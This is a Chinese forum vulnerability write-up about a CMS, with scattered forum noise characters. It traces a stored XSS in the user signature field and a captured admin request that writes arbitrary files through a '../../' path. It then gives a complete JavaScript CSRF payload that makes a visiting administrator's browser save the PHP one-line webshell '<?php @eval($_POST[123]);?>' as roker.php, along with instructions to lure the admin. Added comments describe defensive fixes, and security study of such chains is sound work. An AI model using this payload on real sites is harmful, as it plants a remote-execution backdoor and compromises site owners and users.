这个cms以前90有人发了个getshell，当时是后台验证文件的问题，
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
" }9 Q+ W6 J& N* J/ `本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:7 s5 h; X& e/ N! I
$ z( @) c. }) T3 V2 F) T/ U</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
- E$ q7 t; D' P4 a2 ?! T a2 c/ ~1 _ 8 b Q p( z9 Q0 h7 ?8 V
</textarea></td></tr>& a( C6 |* u+ f& k
user/do.php
' H n; K) Z" i
+ q0 I/ d# ^ t$ c% J# F
if($op=='zl'){ //资料# F, K" k6 x8 w& r' O% {4 {0 t4 Y
% D% L3 V) r( q" @# R4 {! x5 n
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
( U, M2 n) J9 p" b6 h& ] exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
# E4 q! e8 o: B- p/ T ' B& m, Y. X+ S6 U
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',- n6 o+ i+ W$ }2 c4 E
7 I$ _0 B' s: w( [( E: i2 v0 k
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
/ @; ?/ n0 g( [) W4 h. O where CS_Name='".$cscms_name."'";
+ W2 [5 u, m% Q6 c
; X7 B, r, p, x& r2 H( N& |, L: V if($db->query($sql)){
; r, o3 q. a9 g) C( Y6 G {& C
' B5 }8 \2 y3 Q M% ?. x exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));) X3 H4 C6 V* |' T
- Q, R6 F5 A% V/ `1 R- F( u" m }else{- O& o, l: a* x% ^) @3 g6 S
0 O2 G4 G/ X% g5 }* ^) O exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 x# f! l9 Z$ D9 [' u4 ?
. I9 l9 M+ ^3 z" J+ u }# k6 \; N+ n) P0 w7 n0 m7 o& g
W% E/ Q* h+ i) t4 c F
没有过滤导致 XSS 产生（CS_Qianm 在 do.php 写入时未过滤，在 skin_edit.php 输出时也未转义）。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包：
) A# d5 @# u' f) |3 t7 _ O" ?0 w8 `3 u7 P5 V* a5 u8 E5 j# ~& E, a
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
1 W- d3 i. a& l3 y/ l0 ?/ b
( J" P p; @2 Z" J/ P: ZAccept: text/html, application/xhtml+xml, */*' T' N. ^/ j, d% G& G; e8 K$ S
0 s" x+ [- ]+ lReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php; s7 }" [" s% S& O* e) i
$ b- K1 f) L3 n8 n& A
Accept-Language: zh-CN, M. x- \% H, p6 d8 J# C
. j* k" v1 H; T& p R5 r' ~+ K
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
6 y: T5 F# E5 a1 {7 s9 L7 ? ! h3 ]& e: j! p' D7 B
Content-Type: application/x-www-form-urlencoded
' k- n+ r, d' D1 n4 U0 _ ; Z7 ]. `( {2 l: V7 d, y5 U
Accept-Encoding: gzip, deflate
0 f3 y7 x& J0 }' @ 6 o$ C. z: c& `5 v5 b
Host: 127.0.0.13 ]2 u q8 W* y* Z
A9 b4 _0 y7 K! P; b+ o
Content-Length: 38
/ {; G; ?1 n! F6 B 6 f8 ~9 `" t: t1 C* D3 D) ^7 q
DNT: 1- R1 J. l, |! S* }
0 }$ L* A+ F' g5 q. |: u) ~
Connection: Keep-Alive
) s8 l! M: J* X8 i) k4 t+ m / {; c! w1 M+ D' t6 u: ^/ z
Cache-Control: no-cache+ F2 u' |4 L; n* [/ G. u9 N& F
, u, B/ o' L- |2 T$ oCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; |( z* Z. d! K; q
! R$ y: N' \! |1 ?$ H" F7 s
" [. ^8 {; n. d; Z! tname=aaa.php&content=%3Cs%3E%3Ca%25%3E# n1 ^( R6 x* W) x
! K8 E) x; i! k, C: E
1 O5 J5 ^) y; e. x3 G8 `: h s) N' `3 M: b) }2 g
于是构造 JS 如下：
R6 o7 w d1 p+ y# d
( i# q# l8 v; z+ l x6 W本帖隐藏的内容<script>
// Defender note: the target host is read from the page the payload runs in, so the
// stored signature keeps working on whichever host renders it unescaped.
# q5 I: n% l$ H; ~- JthisTHost = top.location.hostname;
6 L2 C2 A8 Y% ^2 \9 T
// The target is the admin template editor, reached with a relative `path` that
// contains `../../`; per the write-up the server does not confine it to the
// template directory. Server-side fix: canonicalize `path` and reject anything
// that resolves outside the intended skins root.
- Q E: q4 c- L K1 ~. v$ WthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";) p5 L, P. V" r) m; u* j, V' G
/**
 * Builds a hidden form and submits it at once: the same POST as the captured
 * request above, but fired from the viewer's browser, which attaches whatever
 * cookies it holds for that host. Nothing in this function reads a CSRF token,
 * and the captured request body carries only `name` and `content`, so a
 * per-session token validated by skins.php (with SameSite cookies as a second
 * layer) is the control that stops this delivery.
 *
 * Naming is misleading: `data` is posted as the `name` field (the file name)
 * and `msg` as the `content` field (the file body).
 *
 * @param {string} url  form action (skins.php with its query string)
 * @param {string} data value of the hidden `name` field
 * @param {string} msg  value of the hidden `content` field
 */
7 V2 t1 B# x5 O7 e+ b& K+ {function PostSubmit(url, data, msg) {
3 B2 y( \, f- ?8 m8 Z+ l; p var postUrl = url;$ T. w# k3 X. n6 k- Y
2 `2 w5 L; D8 b* j( a" Z var postData = data;
6 @$ Z4 `2 m5 A2 E2 a4 g var msgData = msg; 6 U& n8 d. P" ]4 @& D e3 h
var ExportForm = document.createElement("FORM");
" Y& D# d. f q5 {9 e" t0 p document.body.appendChild(ExportForm); ' V# E1 J9 ~0 L. Y: c
ExportForm.method = "POST";
, J; V. @. t7 y& g var newElement = document.createElement("input"); ! T- Q t1 r3 f1 {) h
newElement.setAttribute("name", "name"); ; I- I8 P7 e" E7 W* b
newElement.setAttribute("type", "hidden");
( H6 `0 r9 Z% G8 L. r* Q var newElement2 = document.createElement("input"); * j5 K4 O% ?9 N9 C& Z- V
newElement2.setAttribute("name", "content");
! v% l5 c1 b1 f# `0 ]0 |, u newElement2.setAttribute("type", "hidden");
6 b" W9 x6 F% J# A# D$ M/ [7 f& K8 ^ ExportForm.appendChild(newElement); 3 R0 S6 Q8 D/ {' U
ExportForm.appendChild(newElement2); 8 [, Q3 B* R" z9 C6 _
// Hidden `name` gets the file name, hidden `content` gets the file body.
newElement.value = postData; 0 ~, u5 S/ x4 \
newElement2.value = msgData;
4 f) p/ |0 ?% Z% M; j: F ExportForm.action = postUrl;
// Submission happens without any user interaction on the victim's side.
& ^6 k" u& Y0 _1 S ExportForm.submit(); 1 J! J. J5 e; c9 v
};( Q3 c1 L* ^( l7 U
// Defender note: the file name ends in `.php` and the body is PHP source; per the
// write-up the editor saves both as given. Allow-listing saved extensions to
// template types and confining `path` would block the write even if the
// cross-site POST itself went through.
! F( \' d. o- EPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
r" ?) u4 p; k4 N/ U9 {; Z 5 j* K1 S* d+ g+ N# n: C
</script>" w6 h% Y3 m T9 ?6 y. B+ q
* ~, N& \4 B: \: j% A1 Q1 R
+ ?3 N& H* c/ W9 _+ f4 ?2 x2 u
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处插入。
用你的账号给管理写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改），
就会在 skins\index\html\ 目录下生成 roker.php 一句话。